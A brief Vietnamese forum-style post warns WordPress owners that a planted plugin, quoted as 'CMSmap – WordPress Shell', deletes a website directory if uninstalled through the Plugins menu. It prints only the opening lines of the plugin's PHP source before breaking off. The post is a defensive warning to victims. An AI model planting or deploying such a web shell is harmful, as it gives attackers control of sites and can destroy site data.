Nếu website wordpress của bác nào bị cài plugin này thì tuyệt đối không được gỡ bỏ trong trong Plugin nhé, nếu gỡ là bị xóa hết dữ liệu trong mục …/html/webs

Nếu website wordpress của bác nào bị cài plugin này thì tuyệt đối không được gỡ bỏ trong trong Plugin nhé, nếu gỡ là bị xóa hết dữ liệu trong mục …/html/website
<?php
error_reporting(0);
ignore_user_abort(true);
/**
* Plugin Name: CMSmap – WordPress Shell
* Plugin URI: https://github.com/m7x/

More

Viết một bình luận